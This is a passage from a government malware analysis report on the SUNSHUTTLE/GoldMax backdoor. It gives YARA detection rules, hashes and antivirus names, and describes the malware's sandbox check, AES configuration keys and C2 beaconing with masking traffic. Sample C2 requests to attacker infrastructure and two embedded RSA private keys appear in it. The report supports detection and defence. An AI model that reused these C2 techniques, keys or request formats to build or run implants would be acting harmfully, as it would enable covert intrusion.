\"main.resolve_command\"\r\n       $s9 = \"main.write_file\"\r\n       $s10 = \"main.beaconing\"\r\n       $s11 = \"main.wget_file\"\r\n       $s12 = \"main.fileExists\"\r\n       $s13 = \"main.removeBase64Padding\"\r\n       $s14 = \"main.addBase64Padding\"\r\n       $s15 = \"main.delete_empty\"\r\n       $s16 = \"main.GetMD5Hash\"\r\n   condition:\r\n       filesize\u003c10MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (5 of them)\r\n}\r\nrule FireEye_21_00004531_02 : SUNSHUTTLE backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2021-03-04\"\r\n       Last_Modified = \"20210305_1704\"\r\n       Actor = \"UNC2452\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNSHUTTLE\"\r\n       Description = \"This rule detects strings found in SUNSHUTTLE\"\r\n       MD5_1 = \"9466c865f7498a35e4e1a8f48ef1dffd\"\r\n       SHA256_1 = \"b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\"\r\n   strings:\r\n       $s1 = \"LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk\"\r\n       $s2 = \"LS0tLS1FTkQgUFJJVkFURSBLRVktLS0tLQ\"\r\n       $s3 = \"Go build ID: \\\"\"\r\n   condition:\r\n       filesize\u003c10MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and all of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash 91802a615b3a5c4bcc05bc5f66a5b219\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 13 of 44\n\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nd9e458c1580f06a7f3f2929f5400a209 header 1536 1.227428\r\n97e1f8721f9fae6297bdcceb13887e95 .text 2404352 5.902419\r\nead2f864cd6d16d33f7282151865be45 .rdata 2512384 5.344095\r\nb51b1bb5decadc56e32f8288fc400c68 .data 260608 5.551173\r\nace875ec125258b2042837d2a2443781 .idata 1536 2.877753\r\n07b5472d347d42780469fb2654b7fc54 .symtab 512 0.020393\r\nRelationships\r\nfa1959dd38... Contained_Within f28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c\r\nfa1959dd38... Connected_To 185.225.69.69\r\nDescription\r\nThe file is an 64-bit Windows executable file. This file is the UPX unpacked sample from the UPX packed sample\r\n\"WindowsDSVC.exe\" (f28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c). The application is\r\nwritten in the Golang (Go) open-source language. When executed, the malware terminates its code execution if the victim’s\r\nsystem MAC address is equal to a hard-coded Hyper-V sandbox default MAC address value: \"c8:27:cc:c2:37:5a.\" If not, the\r\nmalware will proceed to check if the file \"%current directory%\\runlog.dat.tmp\" is installed on the compromised system. If\r\nthe file is not installed, it will create and encrypt configuration data using the Advanced Encryption Standard (AES)-256\r\nencryption algorithm with the hard-coded key: \"u66vk8e1xe0qpvs2ecp1d14y3qx3d334.\" The encrypted data is Base64\r\nencoded using the custom Base64 alphabet (\"=\" replaced with null) before being stored into \"runlog.dat.tmp\" in the current\r\ndirectory.\r\nDisplayed below is the format of the configuration before being encrypted and encoded:\r\n   --Begin configuration data--\r\nFormat: MD5 hash of the current time|5-15|0|0|base64 encoded user-agent string\r\nSample observed: 8aebf98f920a2a198c00d87c246572b9|5-\r\n15|0|0|TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NzUuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8\r\n--End configuration data--\r\nThe configuration contains: MD5 hash of the current time | the number range used by its pseudorandom number generator\r\n(PRNG) | enable and disable fake request network traffic feature | activation date| Base64 encoded user-agent string used for\r\nthe requests| padding bytes.\r\nIt will attempt to send a HTTP GET request to its C2 server for a session key. The GET request contain a custom cookie\r\n(unique identifier value for the implant) for authentication, hard-coded User-Agent string and pseudo-randomly selected\r\nHTTP referer value from a list of websites below for masking C2 traffic:\r\n--Begin randomized HTTP referer--\r\nwww[.]google.com\r\nwww[.]bing.com\r\nwww[.]facebook.com\r\nwww[.]mail.com\r\n--End randomized HTTP referer--\r\nIt contains the following hard-coded legitimate and C2 Uniform Resource Identifier (URI):\r\n--Begin C2 URIs--\r\nhttps[:]//185.225.69.69/live\r\nhttps[:]//185.225.69.69/icon.ico\r\nhttps[:]//185.225.69.69/icon.png\r\nhttps[:]//185.225.69.69/script.js\r\nhttps[:]//185.225.69.69/style.css\r\nhttps[:]//185.225.69.69/css/bootstrap.css\r\nhttps[:]//185.225.69.69/scripts/jquery.js\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 14 of 44\n\nhttps[:]//185.225.69.69/scripts/bootstrap.js\r\nhttps[:]//185.225.69.69/css/style.css\r\n--End C2 URIs--\r\n--Begin legitimate URIs--\r\nhttps[:]//www.gstatic.com/images/?\r\nhttps[:]//ssl.gstatic.com/ui/v3/icons\r\nhttps[:]//fonts.gstatic.com/s/font.woff2\r\nhttps[:]//cdn.google.com/index\r\nhttps[:]//code.jquery.com/\r\nhttps[:]//cdn.mxpnl.com/\r\n--End legitimate URIs--\r\nDisplayed below is a sample GET request for a session key:\r\n--Begin sample request --\r\nGET /live/ HTTP/1.1\r\nHost: 185.225.69.69\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nConnection: Keep-Alive\r\nCookie: wDacJ87epY=8aebf98f920a2a198c00d87c246572b9; hBZ38QSGIR7UgOKT=NZQWAvMR6VGKA;\r\n0aUvm7fgB4UB5=IhFr8BnqYbP8ZZg1Zi8VPQWKQTXdRG8q; CLAshlHL1M=114\r\nReferer: www[.]google.com    \r\nAccept-Encoding: gzip\r\n--End sample request --\r\nThe response payload was not available for analysis.\r\nAnalysis indicates that after receiving the response payload from its C2, it will send another HTTP GET request to its C2\r\nsimilar to the above GET request. The only difference being the value of one of the cookies. The malware sends the\r\nfollowing traffic to blend in with real traffic if the fake request network traffic feature in the configuration is enabled (set to\r\n1):\r\nDisplayed below are sample requests:\r\n--Begin request--\r\nGET /ui/v3/icons/ HTTP/1.1\r\nHost: ssl[.]gstatic.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nConnection: Keep-Alive\r\nReferer: www[.]google.com\r\nAccept-Encoding: gzip\r\n--Begin request--\r\n--Begin request--\r\nGET /css/bootstrap.css/ HTTP/1.1\r\nHost: 185[.]225.69.69\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nConnection: Keep-Alive\r\nReferer: www[.]facebook.com\r\nAccept-Encoding: gzip\r\n--Begin request--\r\nThe malware is designed to receive a command from its C2 to allow its remote operator to download and execute files,\r\nupload files, start a command shell, and update the malware configuration data fields (overwriting the existing data in its\r\nconfiguration file with the new configuration data from the remote operator). The configuration data file can allow the\r\nremote operator to set a new activation date, update the number range used by its PRNG, enable and disable fake request\r\nnetwork traffic feature, replace the existing URI and User-Agent values.\r\nThe malware contains a Base64-encoded RSA private key that may be used to decrypt the RSA Optimal Asymmetric\r\nEncryption Padding (OAEP) encrypted session key received from its C2:\r\n--BEGIN PRIVATE KEY--\r\nMIIEowIBAAKCAQEAn7SgleG8sxrq76pXIY/6mKi0EHfN2NVSrY1ELilCSVXUFZl4\r\naQTnuWPlJzRMB0aLlxl4HXyXWJLgtRT//Ar1TTai5/Z/OfP82y0cggudXhg6rc9U\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 15 of 44\n\nfX5zykr1UNtl7Vl13nGh39YySEcMP1Eyz+L8OZ9WAs7G4+s9N7I3Di+a+ZlwG4Rs\r\nJb1zNrqxQlmr5bWgwRlWj0I/ngo7Ej/CjLXJNwW4LOcJu2Ok9R6SLWX1CpdvY/DD\r\nGi5Zdw3RzIuKDwRbUcIRApuiRxjxY/Os4+A+lhazmBsVK59KGKZZ4WckAzdrtFEm\r\ng6VVlWjBv28PGIpXvhH+M9vUg3uPmcwXchg7wwIDAQABAoIBAEJlx2npCxnvtANm\r\nb4k9ofM8GHjMRmHC9ve+xrzmXG++5kkAoGYRKwIRvSDahk10D+8HIMApn4assg23\r\nKGIycB/k+j+0ZNrETLkW/UY36/pF2oeOrlLqctuE5I70WGEgk3ejCKjWFduk5jug\r\n155EgZa3XvwV2ezCTZZNWsRkGGtyrj4AZ/vRX4rIyvMTFzm4/H5Pj6QTCUwTPt2i\r\nukXF7vf8MeDk4m77t7+x40nQ94I1Ti6LtzhiuRMr9Eub7GUHS8wtUq4527FOeKsC\r\nreUDNETCmTZGnAT7KuXRNbhIKyxL/6Kep7Yb18PF5WF9Lyocx/VDHKPoOdv5pqTP\r\n7yn0CLECgYEA0jwbgGTG5I33ghzOeAUmx2hRAPtmFTD9s/7X2vk91lmFCHqg8hVh\r\nbbz6ELWKI9LP4XPzK4uMifJ2z3PXmNCRw4NBZy+0T132PQZd1V1x9lFOmAmiybRi\r\nePCPXtjVPbVQnV3F66Ad/8jv8pvxIZBYBxFGm6FF86WaoJXNKAILv4kCgYEAwnil\r\nFKQYwOyARY5lwjY5dd04r72R3y0Wpa2b8Bo8cJjUR5VsH1XTZnmV/C+dMWhdlB8B\r\nvNZxUOLO16hFhqu/rPEwk8RyvrHU+b89O8mnphVYSq0hEsSBMH5BUjqQiHKu+BEz\r\nvsHb+KVJTcvRIOdrtjZJukeZ2toH9PVolpg44esCgYAffRFBcda4dOsVeesS3vKn\r\n+1/mncD0e5oEU69RBPPWHyJl2rgwijNFlIB/8DD4nKK2Sf+qDgTGxKI3AErSgKrU\r\nddxd8C85lAFFsqZrRsvC8PqsmwTe4T2+j4lp02BdFcM1Ts5ONHVJ0nbeB61eMZh9\r\ntoC03rrze2JlmwpXa7cGwQKBgFUVNZx3QwE9N822xFyZHsCrff6doPGUp4DrGPuO\r\nbv0QUGfVPw3infAKqA1Cw7J3J+IDQt5csA0kfjyqOWj3QZAnogo0e8NkyHpQKjk7\r\nO+cVFaDuaDbu1FrkEi4ow01/Z3/O/uWpqVT687xevOt5dI2u6MjgRLcUh0CsEgs5\r\nJEHrAoGBAL4zB1serfGXHvLO9dDiSO34w5XcVQK4E34ytM224blp16U0nz5hfSQD\r\nWQaISJs/aqBuUgVUA3WZHZbEvKbcU5u0Ieos+rIGJrUv0tJtLgtOBmfz1q3jOKOY\r\nqwQ6HoAHqfOC5FS6t0kBDsrssGHQTqTtrnxhL6l6oBlWWXNMxQ4g\r\n--END PRIVATE KEY--\r\nb9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\r\nTags\r\nbackdoortrojan\r\nDetails\r\nName Lexicon.exe\r\nSize 2036736 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 9466c865f7498a35e4e1a8f48ef1dffd\r\nSHA1 72e5fc82b932c5395d06fd2a655a280cf10ac9aa\r\nSHA256 b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\r\nSHA512 7efa5f638b31b95637a497714b1b33b63abdd72afb035df574a195d20d37381a53f934e0908813dea513f46a4d7cda6a16a0511a721dd8e09\r\nssdeep 49152:Om9E2fAhvsWGCDWMcvIODKsGHgNhX69CFoGlvcpTcVIa:61lIl1mlgb9aGdH\r\nEntropy 7.874690\r\nAntivirus\r\nAhnlab Backdoor/Win32.Sunshuttle\r\nAntiy Trojan[Backdoor]/Win64.Agent\r\nAvira TR/Sunshuttle.A\r\nBitDefender Trojan.GenericKD.34453763\r\nClamAV Win.Malware.SUNSHUTTLE-9838969-0\r\nComodo Malware\r\nCyren W64/Trojan.VYRP-8655\r\nESET a variant of WinGo/Agent.AE trojan\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 16 of 44\n\nEmsisoft Trojan.GenericKD.34453763 (B)\r\nIkarus Trojan.Win64.Rozena\r\nK7 Trojan ( 00578be81 )\r\nLavasoft Trojan.GenericKD.34453763\r\nQuick Heal Trojan.Agent\r\nSophos Troj/GoldMax-A\r\nSymantec Backdoor.GoldMax\r\nTrendMicro Backdoo.207681C5\r\nTrendMicro House Call Backdoo.207681C5\r\nVirusBlokAda Trojan.Win64.WinGo\r\nZillya! Trojan.APosT.Win32.1814\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash e58ab46f2a279ded0846d81bf0fa21f7\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n29214ad437f160f5bd92db6f746ecd8f header 512 2.447284\r\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 0.000000\r\n02892067ad6acb49bb6de6eddcae1f78 UPX1 2035712 7.875271\r\n74553568f3052911c6df3835582d3b64 UPX2 512 1.763456\r\nRelationships\r\nb9a2c986b6... Contains 94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45\r\nDescription\r\nThis file is an 64-bit Windows executable file written in Golang (Go) and was identified as SUNSHUTTLE/Goldmax\r\nmalware. The executable is UPX packed and when executed, the application will unpack and execute\r\n(94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45) in memory.\r\n94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45\r\nTags\r\nbackdoortrojan\r\nDetails\r\nName Lexicon.exeUnPacked\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 17 of 44\n\nSize 5177856 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 ab248df75dd6cc1b19329145b296421d\r\nSHA1 dec462b578a521ac38bbe7cf10c84f1b4bd33415\r\nSHA256 94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45\r\nSHA512 25c458c2ec3ad87434d40a947247675fe4befb424cde5dc99645936076ed1d2b87d1ede9c43b045c11827874eaccb0b28d30bbe36354237e\r\nssdeep 49152:msEdwffUXL8uWH0zMoJmv2vzczcEPAizHjvPXIYXfc8N09uvO+CWh9i2H87i3FMh:dRG4u40z9BEcEPA+HjvwSqic1+A\r\nEntropy 5.962959\r\nAntivirus\r\nAhnlab Trojan/Win64.Cobalt\r\nAvira TR/Sunshuttle.AF\r\nBitDefender Generic.GoldMax.A.0F52032B\r\nClamAV Win.Malware.SUNSHUTTLE-9838970-0\r\nComodo Malware\r\nCyren W64/Trojan.YCHA-1477\r\nESET a variant of WinGo/Agent.AE trojan\r\nEmsisoft Generic.GoldMax.A.0F52032B (B)\r\nIkarus Trojan.Crypter\r\nK7 Trojan ( 00578be81 )\r\nLavasoft Generic.GoldMax.A.0F52032B\r\nMicrosoft Security Essentials Trojan:Win32/GoldMax!MSR\r\nNANOAV Trojan.Win64.Sunshuttle.iodoxr\r\nQuick Heal Trojan.Generic\r\nSophos Troj/GoldMax-A\r\nSymantec Trojan.Gen.MBT\r\nSystweak trojan-backdoor.sunshuttle-r\r\nTrendMicro Backdoo.B97FD07F\r\nTrendMicro House Call Backdoo.B97FD07F\r\nVirusBlokAda Trojan.Glupteba\r\nZillya! Trojan.Agent.Win64.7447\r\nYARA Rules\r\nrule CISA_3P_10327841_02 : SOLARFLARE trojan\r\n{\r\n   meta:\r\n       Author = \"CISA Trusted Third Party\"\r\n       Incident = \"10327841.r1.v1\"\r\n       Date = \"2021-03-04\"\r\n       Actor = \"n/a\"\r\n       Category = \"Trojan\"\r\n       Family = \"SOLARFLARE\"\r\n       Description = \"Detects strings in WindowsDSVC_exe samples\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 18 of 44\n\nMD5_1 = \"4de28110bfb88fdcdf4a0133e118d998\"\r\n       SHA256_1 = \"fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\"\r\n   strings:\r\n       $Go_Lang = \"Go build ID:\"\r\n       $main_func = \"main.main\"\r\n       $main_encrypt = \"main.encrypt\"\r\n       $main_MD5 = \"main.GetMD5Hash\"\r\n       $main_beacon = \"main.beaconing\"\r\n       $main_command = \"main.resolve_command\"\r\n       $main_key1 = \"main.request_session_key\"\r\n       $main_key2 = \"main.retrieve_session_key\"\r\n       $main_clean = \"main.clean_file\"\r\n       $main_wget = \"main.wget_file\"\r\n   condition:\r\n       (uint16(0) == 0x5A4D) and all of them\r\n}\r\nrule FireEye_21_00004531_01 : SUNSHUTTLE backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2021-03-04\"\r\n       Last_Modified = \"20210305_1704\"\r\n       Actor = \"UNC2452\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNSHUTTLE\"\r\n       Description = \"This rule detects strings found in SUNSHUTTLE\"\r\n       MD5_1 = \"9466c865f7498a35e4e1a8f48ef1dffd\"\r\n       SHA256_1 = \"b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\"\r\n   strings:\r\n       $s1 = \"main.request_session_key\"\r\n       $s2 = \"main.define_internal_settings\"\r\n       $s3 = \"main.send_file_part\"\r\n       $s4 = \"main.clean_file\"\r\n       $s5 = \"main.send_command_result\"\r\n       $s6 = \"main.retrieve_session_key\"\r\n       $s7 = \"main.save_internal_settings\"\r\n       $s8 = \"main.resolve_command\"\r\n       $s9 = \"main.write_file\"\r\n       $s10 = \"main.beaconing\"\r\n       $s11 = \"main.wget_file\"\r\n       $s12 = \"main.fileExists\"\r\n       $s13 = \"main.removeBase64Padding\"\r\n       $s14 = \"main.addBase64Padding\"\r\n       $s15 = \"main.delete_empty\"\r\n       $s16 = \"main.GetMD5Hash\"\r\n   condition:\r\n       filesize\u003c10MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (5 of them)\r\n}\r\nrule FireEye_21_00004531_02 : SUNSHUTTLE backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2021-03-04\"\r\n       Last_Modified = \"20210305_1704\"\r\n       Actor = \"UNC2452\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNSHUTTLE\"\r\n       Description = \"This rule detects strings found in SUNSHUTTLE\"\r\n       MD5_1 = \"9466c865f7498a35e4e1a8f48ef1dffd\"\r\n       SHA256_1 = \"b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\"\r\n   strings:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 19 of 44\n\n$s1 = \"LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk\"\r\n       $s2 = \"LS0tLS1FTkQgUFJJVkFURSBLRVktLS0tLQ\"\r\n       $s3 = \"Go build ID: \\\"\"\r\n   condition:\r\n       filesize\u003c10MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and all of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash 91802a615b3a5c4bcc05bc5f66a5b219\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n8ff4385790edf4dc360cdf709edefacb header 1536 1.209291\r\ne7c248921feb7147df53d3c4c1c4481f .text 2402816 5.902294\r\nd6a5f7faecd7889cd4463e7dca0c1bb0 .rdata 2510848 5.344525\r\n842570d7d75648b08153f61c3ad2db42 .data 260608 5.551951\r\n99830eca3610cfe7885679f26396b285 .idata 1536 2.879055\r\n07b5472d347d42780469fb2654b7fc54 .symtab 512 0.020393\r\nRelationships\r\n94c58c7fb4... Connected_To reyweb.com\r\n94c58c7fb4... Contained_Within b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\r\nDescription\r\nThe file is an 64-bit Windows executable file. This file is the UPX unpacked sample from the UPX packed sample\r\n\"Lexicon.exe\" (b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8). The application is written in\r\nthe Golang (Go) open-source language. When executed, the malware terminates its code execution if the victim’s system\r\nMAC address is equal to a hard-coded Hyper-V sandbox default MAC address value: \"c8:27:cc:c2:37:5a.\" If not, the\r\nmalware will proceed to check if the file \"%current directory%\\config.dat.tmp\" is installed on the compromised system. If\r\nthe file is not installed, it will create and encrypt a configuration data using the AES-256 encryption algorithm with the hard-coded key: \"hz8l2fnpvp71ujfy8rht6b0smouvp9k8.\" The encrypted data is Base64 encoded using the custom Base64\r\nalphabet (\"=\" replaced with null) before stored into \"config.dat.tmp\" in the current directory.\r\nDisplayed below is the format of the configuration before being encrypted and encoded:\r\n   --Begin configuration data--\r\nFormat: MD5 hash of the current time|5-15|0|0|base64 encoded user-agent string\r\nSample observed: d2ed208623fa66d2e5372c27c9230fb8|5-\r\n15|0|0|TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NzUuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8\r\n--End configuration data--\r\nThe configuration contains: MD5 hash of the current time | the number range used by its PRNG | enable and disable fake\r\nrequest network traffic feature | activation date| Base64 encoded user-agent string used for the requests| padding bytes.\r\nIt will attempt to send an HTTP GET request to its C2 server for a session key. The GET request contains a custom cookie\r\n(unique identifier value for the implant) for authentication, hard-coded User-Agent string and pseudo-randomly selected\r\nHTTP referer value from a list of websites below for masking C2 traffic:\r\n--Begin randomized HTTP referer--\r\nwww[.]bing.com\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 20 of 44\n\nwww[.]google.com\r\nwww[.]facebook.com\r\nwww[.]yahoo.com\r\n--End randomized HTTP referer--\r\nIt contains the following hard-coded legitimate and C2 URIs:\r\n--Begin C2 URIs--\r\nhttps[:]//reyweb.com/icon.ico\r\nhttps[:]//reyweb.com/icon.png\r\nhttps[:]//reyweb.com/script.js\r\nhttps[:]//reyweb.com/style.css\r\nhttps[:]//reyweb.com/css/style.css\r\nhttps[:]//reyweb.com/assets/index.php\r\nhttps[:]//reyweb.com/css/bootstrap.css\r\nhttps[:]//reyweb.com/scripts/jquery.js\r\nhttps[:]//reyweb.com/scripts/bootstrap.js\r\n--End C2 URIs--\r\n--Begin legitimate URIs--\r\nhttps[:]//ssl.gstatic.com/ui/v3/icons\r\nhttps[:]//cdn.cloudflare.com\r\nhttps[:]//cdn.mxpnl.com\r\nhttps[:]//cdn.google.com\r\nhttps[:]//cdn.jquery.com/index\r\n--End legitimate URIs--\r\nDisplayed below is a sample GET request for a session key:\r\n--Begin sample request --\r\nGET /assets/index.php HTTP/1.1\r\nHost: reyweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nCookie: HjELmFxKJc=d2ed208623fa66d2e5372c27c9230fb8; P5hCrabkKf=gZLXIeKI;\r\niN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx; b7XCoFSvs1YRW=78\r\nReferer: www[.]yahoo.com\r\nAccept-Encoding: gzip\r\n--End sample request --\r\nThe response payload was not available for analysis.\r\nAnalysis indicates that after receiving the response payload from its C2, it will send another HTTP GET request to its C2\r\nsimilar to the above GET request. The only difference being the value of one of the cookies. The malware sends the\r\nfollowing traffic to blend in with real traffic if the fake request network traffic feature in the configuration is enabled (set to\r\n1):\r\nDisplayed below are sample requests:\r\n--Begin request--\r\nGET /ui/v3/icons HTTP/1.1\r\nHost: ssl[.]gstatic.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nConnection: Keep-Alive\r\nReferer: www[.]google.com\r\nAccept-Encoding: gzip\r\n--End request--\r\n--Begin request--\r\nGET /css/bootstrap.css HTTP/1.1\r\nHost: reyweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nConnection: Keep-Alive\r\nReferer: www[.]facebook.com\r\nAccept-Encoding: gzip\r\n--End request--\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 21 of 44\n\nThe malware is designed to receive a command from its C2 to allow its remote operator to download and execute files,\r\nupload files, start a command shell, and update the malware configuration data fields (overwriting the existing data in its\r\nconfiguration file with the new configuration data from the remote operator). The configuration data file can allow the\r\nremote operator to set a new activation date, update the number range used by its PRNG, enable and disable fake request\r\nnetwork traffic feature, replace the existing URI and User-Agent values.\r\nThe malware contains a Base64-encoded RSA private key that may be used to decrypt the RSA OAEP encrypted session key\r\nreceived from its C2:\r\n--BEGIN PRIVATE KEY--\r\nMIIEowIBAAKCAQEA0Aj/3K3m/rKNESwUfHC9qAhnsNYA9bJ4HQ30DPsfPDvbbHZm\r\nUj5nyp2abjYZYMQbWa2+ZO4Ixgfdm0FzsAH/haKIN4sSkbw+YRESYW35MnMI3Adf\r\nmj/eK/yKNblyoe/7iWP3nz+y4Q/QI0L6BrF7VodTaDYtDup3iI+B5zjmhElf9Fmg\r\nS1JiDUgydz5VXJR/esv6hB7GMfEb/3sIAzv5qcwEvGK5HH1EzQ7zjauyhbsF9pHR\r\nzCFYlvW4OtaU0o3xjVufo5UwYRS5p/EFpof45zuJGLJ02cKUmxc0OX53t3Bn9WXY\r\naDDhYp/RPzywG8N9gTBv8rKxRIsFxxKu+8wK+QIDAQABAoIBAGe4hPDe13OXTBQK\r\nuTAN+dEkV6ZoHFRjpdU+lrY+IiWi5lSed4d7y73OdCeM23xOaiB9KpchwsgRNeDp\r\ncieH54EWNvoSYbC9fRBiNZrT/NG1Xu5s0rKSM1AU+kes7UVl5DBs4hHI7YOeobRi\r\n+UuLA6ZxlBk6IZ71MaGpgyfoS64aDMvZDtcaTEGzw6dRQAU9255DTIc2YYbq8MqL\r\nzSafD5eBDH3Izmblg0kXiidec1A1sytz5u8xW4XckHfp4xePLVw/RvLJGqNJMK5M\r\n7tXAFwPzg+u4k7ce7uNw9VWW7n28T9xznUux1gtPQj1N6goDaBaOqY+h0ia9F1RP\r\nwu6ZtG0CgYEA8vCFmAGmMz4vjO04ELyPnvnaS6CReYCVzmvNugIDlxBLDGCnKBVx\r\net7qEk3gMkbtcDUOZpXQAIVCWQNupAhI0t5bb/Pfw3HtH3Xt5NRUYmwxTgNRe06D\r\ni4ICsg2+8TDinjne9hzsEe9DYE2WRrtLMJ+IPD+QE94J3Sei03k1wpMCgYEA2zga\r\nTff6jQeNn9G0ipHa1DvJmi98px51o0r7TUfZRxJfgg4ckyMsZUHKALrZszKAnxP7\r\nMXYrJuOHpsp0EZc1e3uTjFzrKyKRTQ78c7MNGv07w1PlZuNLtkoqepUjkQzdxKZO\r\ng9gG0O4lC5jjnSg8jUSChhZn+jrU8Vx7ByOP98MCgYAWi5+6RZzo8IJ1L6aeVwF1\r\nHXbWweX+QqKkb3i+JGW05Twxv96DZ8oKPxm17Sg7Qj3Sxfm6J3kQM02++QSRkHtB\r\npoUR1K4Vc0MwQj97lwDlyWih9sjfCqBGmCAr6f6oX4MIcBJzAKgf2faEv26MzeDi\r\neEuqW7PBRD/iGEWSHpOQpQKBgQDRgV+aTjk0mRhfugHKQLSbCnyUj3eZG8IfiiR7\r\nagQcKVH/sE7cy8u9Bc/xPKGb4dMMtQLm9WEuLFtTKr8cpJ8nYSXVCmRx9/pXY9Af\r\nHuqSdZutBDwERYvxLhZEys2P7XTwYGQ/GrEA8eeTms1FP9QGyofXcAh1G86w0Mp/\r\nOxx3EwKBgHXxgQa4/ngTlMNhWP+IvHOlOVAxDK2GL3XQdr8fudZe9c1d7VzIbYj6\r\ngbwLT9qi0wG5FAWqH163XucAirT6WCtAJ3tK0lfbS7oWJ7L/Vh1+vOe6jfS/nQna\r\nAo2QPbN8RiltHeaAq0ZfrgwrQuP5fmigmBa5lOWID/eU2OLlvJGi\r\n--END PRIVATE KEY--\r\nreyweb.com\r\nTags\r\ncommand-and-control\r\nURLs\r\nreyweb.com/assets/index.php\r\nreyweb.com/css/bootstrap.css\r\nreyweb.com/css/style.css\r\nreyweb.com/icon.ico\r\nreyweb.com/icon.png\r\nreyweb.com/script.js\r\nreyweb.com/scripts/bootstrap.js\r\nreyweb.com/scripts/jquery.js\r\nreyweb.com/style.css\r\nHTTP Sessions\r\nGET /assets/index.php HTTP/1.1\r\nHost: reyweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nCookie: HjELmFxKJc=d2ed208623fa66d2e5372c27c9230fb8; P5hCrabkKf=gZLXIeKI;\r\niN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx; b7XCoFSvs1YRW=78\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 22 of 44\n\nReferer: www[.]yahoo.com\r\nAccept-Encoding: gzip\r\nGET /assets/index.php HTTP/1.1\r\nHost: reyweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nCookie: HjELmFxKJc=f27616f33730acfea04a05e53081d1ec; P5hCrabkKf=gZLXIeKI;\r\niN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx; b7XCoFSvs1YRW=78\r\nReferer: www[.]facebook.com\r\nAccept-Encoding: gzip\r\nWhois\r\nDomain Name: REYWEB.COM\r\nRegistry Domain ID: 